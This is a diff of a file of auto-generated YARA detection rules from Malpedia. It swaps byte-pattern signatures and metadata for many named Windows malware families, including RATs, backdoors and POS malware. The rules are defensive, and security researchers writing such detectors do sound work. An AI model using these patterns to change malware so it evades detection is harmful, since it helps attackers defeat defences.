"0df38e9a7bf0b18ae5c795f617ec217aef7020970864c9cdbebdcaf5c85c3174" score = 75 quality = 75 tags = "FILE" @@ -176755,32 +179441,32 @@ rule MALPEDIA_Win_Kwampirs_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 8d45f0 64a300000000 8965e8 8bf9 33db } - $sequence_1 = { e8???????? b001 8b4df0 64890d00000000 59 } - $sequence_2 = { 51 e8???????? 83c404 a3???????? 33f6 } - $sequence_3 = { 3bf3 7642 56 e8???????? 8907 } - $sequence_4 = { 668955f4 33d2 668955f6 e8???????? 83c40c } - $sequence_5 = { c3 32c0 8b4df0 64890d00000000 59 } - $sequence_6 = { 8d4df0 51 68???????? e8???????? 83c40c 32c0 } - $sequence_7 = { 6a00 6800001000 6a03 6a00 } - $sequence_8 = { 83c404 8a45e7 8b4df0 64890d00000000 59 5f } - $sequence_9 = { 33c5 50 8d45f0 64a300000000 8965e8 8bf9 33db } + $sequence_0 = { 59 8b45ec e8???????? c3 6834020000 b8???????? e8???????? } + $sequence_1 = { 57 ffb5e8feffff ff15???????? 8bb5ecfeffff 2bf3 f7de 1bf6 } + $sequence_2 = { c745dc44eb4300 c745e08ceb4300 c745e40cee4300 c745e820ee4300 c745ec34ee4300 c745f0f4ec4300 c745f4fcec4300 } + $sequence_3 = { 8b06 8b4008 89480c 8b06 894808 8b4508 8908 } + $sequence_4 = { 59 33c0 8d7dc8 f3ab aa 8d45c8 6a21 } + $sequence_5 = { 33c0 8903 894304 57 894308 ff15???????? c70300000000 } + $sequence_6 = { 8d854cfbffff 50 8bc7 e8???????? 59 59 57 } + $sequence_7 = { ff5108 8d85e0fbffff 50 ff15???????? ff85d8fbffff 39bdb4fbffff } + $sequence_8 = { 50 e8???????? 837c241801 59 59 7408 c744241807000000 } + $sequence_9 = { b90a0a0000 663b4c07fe 7508 8945fc be01000000 40 } condition: - 7 of them and filesize <2695168 + 7 of them and filesize <1163264 } -rule MALPEDIA_Win_Abaddon_Pos_Auto : FILE +rule MALPEDIA_Win_Hoplight_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8a8bfe7b-07a3-507a-8985-62178b8d7d5d" + id = "d07c2fe2-ecaa-5d6d-9200-86c11ba23c84" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.abaddon_pos_auto.yar#L1-L170" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hoplight_auto.yar#L1-L90" license_url = "N/A" - logic_hash = "e2d8547af0d263d117f46abc9755b5a7e9f77ec4346ade26de1285350cf4f083" + logic_hash = "247623c43b610ddcbb448aac3610ffa1141476124d800ee4677cf300abbf0143" score = 75 quality = 75 tags = "FILE" @@ -176794,38 +179480,30 @@ rule MALPEDIA_Win_Abaddon_Pos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7402 eb27 8b8600010000 03860c010000 89867c010000 8b8684010000 } - $sequence_1 = { ba00000000 eb05 ba01000000 0186ac010000 } - $sequence_2 = { 80beb801000001 751b 80fa30 7205 80fa39 7605 80fa20 } - $sequence_3 = { 41 89c0 49 c7c100000000 ff15???????? 48 83c420 } - $sequence_4 = { 48 8986d0050000 48 83ec20 48 c7c100000000 } - $sequence_5 = { 89d8 69c080000000 3d002d0000 7602 eb22 } - $sequence_6 = { 7318 807c1e2c41 720c 807c1e2c5a } - $sequence_7 = { 81bea001000000dc0500 740c 81bea001000000d60600 7508 6a05 ff15???????? 8b86a0010000 } - $sequence_8 = { 31c9 31d2 80beb401000001 7505 } - $sequence_9 = { ffc3 ebd1 48 31db } - $sequence_10 = { 8986b0050000 48 83ec20 48 8b8eb0050000 48 } - $sequence_11 = { 0504d00700 48 8986c8050000 48 0504d00700 48 8986d0050000 } - $sequence_12 = { 83f800 7502 ebe4 50 ff15???????? 6a00 6a00 } - $sequence_13 = { 83c000 48 8b9eb8050000 48 8918 48 } - $sequence_14 = { 0500040000 3b19 730f 311418 } - $sequence_15 = { 720b 803939 7706 fe86a8010000 } + $sequence_0 = { 488b4c2460 e8???????? 8b442428 488d0d5e680200 } + $sequence_1 = { 488b5260 8b0481 894208 488b842480000000 } + $sequence_2 = { 8b442424 25ff000000 8bc0 488d0d87740200 } + $sequence_3 = { 4889542420 4d8bc8 488b442440 4c8bc0 } + $sequence_4 = { 4c8bb42498040000 488b8d80030000 4833cc e8???????? } + $sequence_5 = { 488d4c2460 e8???????? 488b842470020000 488b4060 } + $sequence_6 = { 4833c4 48898424f8000000 c744242800000000 488b842410010000 } + $sequence_7 = { 4c8d05883c0300 488bd0 488b4c2450 e8???????? } condition: - 7 of them and filesize <40960 + 7 of them and filesize <765952 } -rule MALPEDIA_Win_Zumanek_Auto : FILE +rule MALPEDIA_Win_Action_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "87aee693-fd24-5045-ad68-bbf967fca577" + id = "b171bb40-9b64-5f84-b8a8-e9db33470a7a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zumanek" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zumanek_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.action_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.action_rat_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "692948458546aa7f1172f720f7a047815fbd39df276c694923c84a71f1135e40" + logic_hash = "d6b5f7381b8e2ad2725999fb927500f671ba77c3542ba9198900375907d98a2d" score = 75 quality = 75 tags = "FILE" @@ -176839,32 +179517,32 @@ rule MALPEDIA_Win_Zumanek_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { fc 81fe382e9330 97 e412 3dd16312c9 103f 0800 } - $sequence_1 = { 8802 98 811212242434 48 3c91 4a } - $sequence_2 = { 894612 4d 2454 48 5b 91 } - $sequence_3 = { 71ef 1a6f35 e30b 5d fc 77f2 f1 } - $sequence_4 = { 1dba45e22f 91 7c8b e459 0920 122424 } - $sequence_5 = { 386b95 4c 53 196a17 } - $sequence_6 = { 4a e8???????? 86b71986f742 06 58 4c 8812 } - $sequence_7 = { c101f6 53 32b879629b65 76a2 43 fc } - $sequence_8 = { d9c3 ab 5f c50f 9d 54 f233591b } - $sequence_9 = { 5a c59cd53a93a658 98 9f f5 6b80e7fa856bb2 55 } + $sequence_0 = { 8d4d0c e8???????? 8b4508 8b4df4 64890d00000000 59 5b } + $sequence_1 = { 8b55f8 52 8b4dfc 83c134 e8???????? 8b00 50 } + $sequence_2 = { 83c270 52 8b4dfc 83c170 } + $sequence_3 = { e8???????? c745d400000000 eb09 8b4dd4 83c101 894dd4 8d4d0c } + $sequence_4 = { 7420 0fb645fb 50 8b4df4 8b4918 e8???????? 0fb6d0 } + $sequence_5 = { 0fb74202 50 ff15???????? 0fb7c8 8b5514 890a } + $sequence_6 = { 6a00 8b45fc 50 8b4d08 51 e8???????? 83c418 } + $sequence_7 = { e8???????? 8d8ddcfbffff e8???????? c645fc0e 6a00 68e0930400 6a00 } + $sequence_8 = { 0de0000000 b901000000 6bd100 8b4d0c 880411 8b5508 c1fa06 } + $sequence_9 = { 8b4df4 3b4df8 750b 68???????? ff15???????? 8b55ec 833a22 } condition: - 7 of them and filesize <58867712 + 7 of them and filesize <480256 } -rule MALPEDIA_Win_Svcready_Auto : FILE +rule MALPEDIA_Win_Babylon_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "18ab3505-c0ef-5267-b797-184b8eb52424" + id = "520c4cbb-7168-5cad-9ac5-61fcc34e0523" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.svcready" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.svcready_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babylon_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.babylon_rat_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "e011f730891f501adbcafbb04605066e1d9bcba49b0031ae67a9bae5fc387ad9" + logic_hash = "d4eca63a433742f88d4570a738d70afc76a66ddfd0669e9e8d639b4f32143e21" score = 75 quality = 75 tags = "FILE" @@ -176878,32 +179556,32 @@ rule MALPEDIA_Win_Svcready_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33c8 c1ca0d 33ce 8bc3 33c1 c1ce03 894c2418 } - $sequence_1 = { 83611000 c741140f000000 68???????? c60100 e8???????? 8365fc00 } - $sequence_2 = { 59 59 895dc0 895dc4 895dc8 8b4df4 8bc6 } - $sequence_3 = { 8904d1 56 ff742410 8d4f04 e8???????? 8b44240c 5f } - $sequence_4 = { 8bd8 8a0b 80f97f 0f855fffffff 8b54240c 8b4d18 } - $sequence_5 = { d1cb 33d5 8bc7 c1e003 33da c1cd07 } - $sequence_6 = { 33c3 8bd7 33c5 0bd3 8bda 0bd1 33d9 } - $sequence_7 = { e8???????? 83c414 eb1a 53 57 e8???????? 668b442430 } - $sequence_8 = { c645fc01 8d45d8 ff7508 53 6a10 83ec18 8bcc } - $sequence_9 = { 7607 bbffffff7f eb0a b816000000 3bd8 0f42d8 8d4b01 } + $sequence_0 = { ff75ec 8908 e8???????? 83c40c 85c0 7407 8b4808 } + $sequence_1 = { ff761c 6a44 57 e8???????? 83c418 eb36 6a00 } + $sequence_2 = { f6c23e 0f84ac000000 8bc3 83e01a 663bc3 740e 8bc3 } + $sequence_3 = { ffb50cffffff ffb5f0feffff e8???????? 8bc8 e8???????? 660f28c8 eb54 } + $sequence_4 = { e8???????? 56 e8???????? 59 50 56 8d8dc8fbffff } + $sequence_5 = { ff15???????? 50 680a190000 e9???????? e8???????? 8945f8 59 } + $sequence_6 = { ff36 0fb6c9 51 ff761c ff7510 ff7508 e8???????? } + $sequence_7 = { c645fc01 85c0 7404 8b10 eb02 8bd3 8b45e8 } + $sequence_8 = { ff7708 6a77 53 e8???????? ff751c 53 e8???????? } + $sequence_9 = { ff7514 ff7510 57 e8???????? 83c40c eb79 53 } condition: - 7 of them and filesize <1187840 + 7 of them and filesize <1604608 } -rule MALPEDIA_Win_Orpcbackdoor_Auto : FILE +rule MALPEDIA_Win_Spider_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "605ecf11-b36e-51cd-8e37-c406fe5ee743" + id = "8b8fb932-c9c0-5d1a-a1ff-94b4f85b8abe" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orpcbackdoor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.orpcbackdoor_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spider_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.spider_rat_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "a975ab0f24495978f9e8b667b3f6b02066e8ac424646b3588e19f69238c5dbdd" + logic_hash = "86dc62debebef6e9c395034c4368c0804fc586029188907fa2c1533f611f9771" score = 75 quality = 75 tags = "FILE" @@ -176917,32 +179595,32 @@ rule MALPEDIA_Win_Orpcbackdoor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b45fc 83e818 50 e8???????? 59 59 } - $sequence_1 = { 59 ffb5e4f6feff ffb568f5feff 8d8594f9ffff 50 e8???????? 83c40c } - $sequence_2 = { 6a0c 59 be???????? 8dbdc0faffff f3a5 66a5 a4 } - $sequence_3 = { 8b45c4 0fbe00 83f87f 7452 8b45c4 0fbe00 85c0 } - $sequence_4 = { 753e 8b45c8 40 40 3b4524 7734 8b4520 } - $sequence_5 = { 83a5b0fdffff00 8d85b0fdffff 50 6a02 8b85b4fdffff 8b00 ffb5b4fdffff } - $sequence_6 = { 8841fd eb0e a1???????? 0345f4 c640fd00 eb05 } - $sequence_7 = { 6a01 6a40 6a01 6a01 8d8da8fcfeff e8???????? 50 } - $sequence_8 = { 3c5a 7712 0fbec1 83e820 83e07f 8a044589700310 } - $sequence_9 = { 0fbe4001 83f858 7508 8b45c4 40 40 } + $sequence_0 = { e9???????? 4883c708 488b1f 488bd3 488d8c2490000000 e8???????? } + $sequence_1 = { 418bc3 4c8d5c2460 498b5b18 498b7328 498be3 5f c3 } + $sequence_2 = { 488b6c2438 488b742440 8958f0 488b07 4863cb 488b5c2430 c6040100 } + $sequence_3 = { e8???????? 488b4d70 4883c160 ff15???????? 90 488d05b726fbff eb00 } + $sequence_4 = { 84c0 7471 4885f6 7505 83fd01 7415 488b8f88000000 } + $sequence_5 = { 7458 6683fa01 7452 ff15???????? 4c8bc6 8bd5 0fb7cb } + $sequence_6 = { 7410 488b8f88000000 e8???????? 85c0 7802 33db 8bc3 } + $sequence_7 = { 498bd8 488bf2 488bf9 4d85c0 7430 4885d2 742b } + $sequence_8 = { ff15???????? 488bc8 e8???????? 488d15d3b00300 488bce 488905???????? ff15???????? } + $sequence_9 = { ba03000000 488d442440 448d4a61 448d42fe 4889442420 e8???????? } condition: - 7 of them and filesize <918528 + 7 of them and filesize <1107968 } -rule MALPEDIA_Win_Chches_Auto : FILE +rule MALPEDIA_Win_Xfsadm_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a2d17035-5b65-5ddb-9479-7e5b4a4aa253" + id = "6a0bbf1b-24f1-56ab-8ac3-dbd47808408e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chches_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xfsadm" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xfsadm_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "90b994c4c0ea91e131f92144cfcd7cc30920c864cbd411a57992ff45077985cd" + logic_hash = "b3759828684909f4ce479e79726b48d5eca09cda3ca207a8e06b6b8b2444949c" score = 75 quality = 75 tags = "FILE" @@ -176956,32 +179634,32 @@ rule MALPEDIA_Win_Chches_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b45f4 8b7dfc 50 8b8628020000 ffd0 8b45f8 85c0 } - $sequence_1 = { 85c0 7e0b 8b55f8 8b435c 6aff 52 } - $sequence_2 = { 8d5f18 85db 7477 8b16 8b4244 8b4018 } - $sequence_3 = { 8b16 8945fc 8b4244 3bc7 0f842b020000 8b00 8b7dfc } - $sequence_4 = { b810000000 e8???????? 83c420 8945f0 c745f400000000 85c0 0f8405010000 } - $sequence_5 = { 66890c78 47 ba2a000000 8d8d98fdffff 66891478 8b9680020000 51 } - $sequence_6 = { 8b4004 85c0 7475 3902 746d 8b4e64 50 } - $sequence_7 = { 81e980191001 03c1 50 68bfa2c2cd 687f90b056 68a71001fe 686021a031 } - $sequence_8 = { 895da0 85db 740f 8b87b8010000 8d5594 52 53 } - $sequence_9 = { c745f401000000 eb1c 50 6a08 ffd2 50 } + $sequence_0 = { 83c40c 85c0 0f8431010000 81ff???????? 0f849f000000 6a01 68???????? } + $sequence_1 = { 50 ff15???????? ffb534fdffff 8bf0 ff15???????? 0fb60d???????? 33c0 } + $sequence_2 = { 8b7e38 85ff 0f8576010000 53 68f80f0000 e8???????? } + $sequence_3 = { 85c9 7455 83c60c 3bf1 744e } + $sequence_4 = { 8b4008 8a0406 3c3d 745e } + $sequence_5 = { 83fa02 7211 8b4dfc 8a06 46 8b0c8df8d84200 88440f2b } + $sequence_6 = { 5b 8be5 5d c20800 3c2f 751c } + $sequence_7 = { 2d10010000 741d 83e801 7521 0fb74510 83f801 } + $sequence_8 = { 8d460c 83c410 3bc8 7409 51 e8???????? 83c404 } + $sequence_9 = { 50 e8???????? 8b4e08 8d460c 83c410 3bc8 } condition: - 7 of them and filesize <122880 + 7 of them and filesize <566272 } -rule MALPEDIA_Win_Cherry_Picker_Auto : FILE +rule MALPEDIA_Win_Sodamaster_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4ae5e79a-a840-5921-89d9-37d4576478a8" + id = "5c8830e9-776d-5d52-b260-bf93f938f131" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cherry_picker_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sodamaster_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "34271a3488eb7c13dc528b66980352e939907040bf405db0ad386d2bee3e0b44" + logic_hash = "a33360882a3ef608d87207bac124912433c6a8960ab3afceadfd4533af00bd98" score = 75 quality = 75 tags = "FILE" @@ -176995,34 +179673,34 @@ rule MALPEDIA_Win_Cherry_Picker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 68???????? 68???????? a3???????? ffd6 69c0e8030000 68???????? } - $sequence_1 = { 80fa3b 7503 83c9ff 8817 47 } - $sequence_2 = { 68???????? 56 89442420 ffd3 68???????? 56 } - $sequence_3 = { 8bf0 0fbec9 81e6ff000000 33f1 } - $sequence_4 = { a1???????? 53 8b1d???????? 56 57 6aff } - $sequence_5 = { a3???????? 85c0 7512 68???????? 50 50 } - $sequence_6 = { ff15???????? 8bf0 68???????? 56 ffd3 68???????? 56 } - $sequence_7 = { 6800010000 68???????? 68???????? 68???????? 68???????? ffd6 68???????? } - $sequence_8 = { a1???????? 56 6aff 50 8bf1 } - $sequence_9 = { ffd6 68???????? 6800010000 68???????? } + $sequence_0 = { e8???????? c70009000000 e8???????? ebd2 8bc3 c1f805 8d3c85a0330110 } + $sequence_1 = { 8908 894804 8bf0 eb02 33f6 6a40 6800100000 } + $sequence_2 = { 8d4900 8d97feefff7f 85d2 7419 8a140e 84d2 7412 } + $sequence_3 = { 8945e4 3d01010000 7d0d 8a4c181c 888810080110 40 } + $sequence_4 = { 33f6 6a40 6800100000 8d4301 50 6a00 ff15???????? } + $sequence_5 = { 83c424 83ffff 5f 5e 5b } + $sequence_6 = { 83c8ff e9???????? 8bc6 c1f805 8bfe 53 8d1c85a0330110 } + $sequence_7 = { 33f6 8d45f8 50 8b4508 c745e8636d643d c645ec00 } + $sequence_8 = { e8???????? 56 e8???????? 83c418 ff15???????? } + $sequence_9 = { 6a02 53 68ff010f00 52 } condition: - 7 of them and filesize <712704 + 7 of them and filesize <134144 } -rule MALPEDIA_Win_Slothfulmedia_Auto : FILE +rule MALPEDIA_Win_Volgmer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e689a948-8c82-52e0-a234-12c770624669" + id = "6318a069-35e9-5ac9-b46b-f601ef58e4f8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slothfulmedia" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.slothfulmedia_auto.yar#L1-L171" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.volgmer_auto.yar#L1-L360" license_url = "N/A" - logic_hash = "0fe44aa9ee5461148172e6c82a2b51d37b08cccc220629908d9ee4d92a4c22d4" + logic_hash = "f927338edc5a7e32548016c88c35f08a0b0dddf5ae3c9ab69c63c8695ae3cd83" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -177034,38 +179712,59 @@ rule MALPEDIA_Win_Slothfulmedia_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e9???????? 5f 8d4638 5e } - $sequence_1 = { 8938 8bd8 83c008 8945fc } - $sequence_2 = { 68???????? be04010000 33c9 56 } - $sequence_3 = { 83c002 663bca 75f5 2bc6 d1f8 } - $sequence_4 = { 40 e8???????? bb04010000 53 8d85e0fdffff 50 } - $sequence_5 = { 8b835c040000 68???????? 0564010000 6a05 50 e8???????? 83c418 } - $sequence_6 = { 0fb7f0 f7de 6aff ff7508 } - $sequence_7 = { 8d444606 83c410 0375f0 891c08 ff45fc } - $sequence_8 = { 6689442414 e8???????? 83c40c 6a00 ff15???????? } - $sequence_9 = { ff15???????? 8b8c2410020000 5f 5e 33cc 33c0 } - $sequence_10 = { 68???????? ffd6 85c0 7507 ffd7 83f805 } - $sequence_11 = { 5e 33cc 33c0 e8???????? 81c40c020000 c21000 3b0d???????? } - $sequence_12 = { 8d54240c 6a00 52 e8???????? 83c40c 6804010000 8d44240c } - $sequence_13 = { 6a04 6a00 8d4c2410 51 ff15???????? 8b8c2410020000 5f } - $sequence_14 = { 6a00 ff15???????? 8b35???????? 8b3d???????? 90 68???????? ffd6 } - $sequence_15 = { 68d0070000 ff15???????? 33c0 6806020000 50 } + $sequence_0 = { 488b4d40 4833cc e8???????? 4c8d9c2450010000 498b5b18 498b7b20 498be3 } + $sequence_1 = { 48897c2418 55 488d6c24b0 4881ec50010000 488b05???????? 4833c4 48894540 } + $sequence_2 = { e8???????? 488b4dc3 41890424 e8???????? } + $sequence_3 = { d1c6 c1c105 03c6 89742404 03c3 } + $sequence_4 = { ff15???????? 4885c0 740f 488b4018 488b08 8b01 8905???????? } + $sequence_5 = { 8b45b0 488d8dc00f0000 4533c9 4889742430 89442428 ba00000080 c744242003000000 } + $sequence_6 = { e8???????? 488bd8 eb03 488bdf 488d056efeffff } + $sequence_7 = { 75e9 488d8d90140000 48ffc9 40387101 488d4901 75f6 4c8b45a0 } + $sequence_8 = { c6843de011000000 488d8de0110000 e8???????? 488b4c2440 488d95e0110000 ff15???????? 0fb63d???????? } + $sequence_9 = { 488d4d60 41b808040000 8bf8 e8???????? ba32d00200 b940000000 ff55e0 } + $sequence_10 = { e8???????? 488d8dd2050000 33d2 41b806020000 6689bdd0050000 e8???????? } + $sequence_11 = { ff15???????? 85c0 7507 b800000100 eb26 } + $sequence_12 = { e8???????? e8???????? e8???????? e8???????? c705????????04000000 } + $sequence_13 = { e8???????? 85c0 7466 33d2 488d8c24e4000000 41b804040000 e8???????? } + $sequence_14 = { 8bd6 c68435000a000000 488d8d000a0000 e8???????? 488d95000a0000 498bce ff15???????? } + $sequence_15 = { eb17 894638 eb0e c74634047b7300 c7463806000000 } + $sequence_16 = { 8a07 8b0c9580f16e00 8844192e 8b049580f16e00 804c182d04 } + $sequence_17 = { 8b4504 8b4d0c 6a00 52 } + $sequence_18 = { 8b048dd4926d00 ffe0 f7c703000000 7413 8a06 8807 } + $sequence_19 = { e9???????? c745dc02000000 c745e0e4ba7300 8b4508 8bcf } + $sequence_20 = { 83c408 85f6 0f84b7010000 8bce 8d85d0fdffff } + $sequence_21 = { 03048d80f16e00 50 ff15???????? 5d c3 8bff } + $sequence_22 = { 50 68???????? ff7708 ff95e4f3ffff 817f1400008000 89470c 751c } + $sequence_23 = { 5f 5e c684101803000000 5b } + $sequence_24 = { 8a4c2428 8d442428 3acb 741a } + $sequence_25 = { 40 c745ecb8996d00 894df8 8945fc 64a100000000 8945e8 8d45e8 } + $sequence_26 = { 50 52 56 6a00 68e9fd0000 ff95e8f3ffff ff7714 } + $sequence_27 = { 50 51 53 53 6800000008 } + $sequence_28 = { ff15???????? 8d442408 50 ff15???????? 85c0 5f 740c } + $sequence_29 = { ba???????? 2bd1 668b0c02 6685c9 } + $sequence_30 = { c745dc03000000 c745e0e0ba6e00 e9???????? 83e80f 7451 } + $sequence_31 = { 33d2 05d9e7ffff 56 83f815 0f8711010000 ff2485786b6d00 51 } + $sequence_32 = { 8a01 41 84c0 75f9 6a00 2bca 8d85d0f5ffff } + $sequence_33 = { 8d0d90b87300 ba1b000000 e9???????? a900000080 7517 ebd4 a9ffff0f00 } + $sequence_34 = { e9???????? 894ddc c745e0d8ba6e00 e9???????? c745e0d4ba6e00 eba2 894ddc } + $sequence_35 = { 8b4de8 8b048580f16e00 f644082840 7409 } + $sequence_36 = { 396c2434 750b 396c2430 7505 } condition: - 7 of them and filesize <122880 + 7 of them and filesize <393216 } -rule MALPEDIA_Win_Acronym_Auto : FILE +rule MALPEDIA_Win_Protonbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3a02b0db-7dab-59f7-8844-7d3e20bbfec7" + id = "b19d2c4d-3d72-5fe6-aaaa-c0b323237a91" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.acronym_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.protonbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.protonbot_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "f0c8874a39c6e7d48d0efb9f6335d89bb8e6f6e657bab8b7e1fc238f6642ecb8" + logic_hash = "9f42d2358a0490651f249ec756eecbb8cc6207cec8ace7f179285ca0a209261c" score = 75 quality = 75 tags = "FILE" @@ -177079,32 +179778,32 @@ rule MALPEDIA_Win_Acronym_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 89550c 8b4510 034508 8a08 884dff 8b5510 03550c } - $sequence_1 = { 8b55e8 8a45f4 88040a ebac 33c9 75fc 8be5 } - $sequence_2 = { 50 ff15???????? 8945f8 8b4dfc 8b5110 52 8b45fc } - $sequence_3 = { e8???????? 8bc8 e8???????? 0fb6d0 85d2 0f85d4000000 8b450c } - $sequence_4 = { c745fc00000000 eb09 8b45fc 83c001 8945fc 8b4df4 83c104 } - $sequence_5 = { 6a00 6a00 ff15???????? b901000000 85c9 0f84fd000000 c745f000000000 } - $sequence_6 = { 2b55bc 8955b8 8b45b8 8945cc 33c9 75fc 8b55dc } - $sequence_7 = { 8b0c90 83c101 8b55f4 8b45f0 0fb754505e 8b45ec 69c008040000 } - $sequence_8 = { 8b4508 50 e8???????? 83c410 ebaa 8b45c4 69c0c51d0000 } - $sequence_9 = { 69d208040000 8b7508 8d941660b10000 89048a 8b45f4 8b4df0 0fb754411c } + $sequence_0 = { 0f434550 6a00 6a00 6a00 } + $sequence_1 = { 8b36 8d442408 50 56 e8???????? 83c408 83f808 } + $sequence_2 = { e8???????? 8d8dd4feffff e8???????? 83c418 c645fc01 } + $sequence_3 = { 899df8fffeff e8???????? 83c410 8bf8 } + $sequence_4 = { 8bf1 6a04 c745fc01000000 e8???????? 83c404 8bf8 } + $sequence_5 = { 837f1410 7202 8b3f 57 50 e8???????? ffb5d4feffff } + $sequence_6 = { 7f8d 5e 5f 33c0 5b 8b4dfc } + $sequence_7 = { 50 8d45f4 64a300000000 8bda 8bf9 8d8dd8feffff } + $sequence_8 = { 8d85b8fbffff 0f4385b8fbffff 50 8d85d0fbffff 68ff000000 50 e8???????? } + $sequence_9 = { b901000000 8bc2 c1e81e 33c2 69d06589076c 03d1 89948d54ecffff } condition: - 7 of them and filesize <466944 + 7 of them and filesize <1073152 } -rule MALPEDIA_Win_Agendacrypt_Auto : FILE +rule MALPEDIA_Win_Pcshare_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "20fa12ae-39fc-589c-ac17-0baa3bbfd44a" + id = "7acb8456-1058-55a0-81ba-27e3cb590933" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agendacrypt" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.agendacrypt_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pcshare" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pcshare_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "b4f726649ba175df63b497d8d60f55fe36fe0cd2719e493aac65ae353f8a7651" + logic_hash = "7ae15dd51d8c67d0995dcb010803cd76a95f2636c119f9eefe8dfedf04aaf2b7" score = 75 quality = 75 tags = "FILE" @@ -177118,32 +179817,32 @@ rule MALPEDIA_Win_Agendacrypt_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb20 8b55ec 8975e8 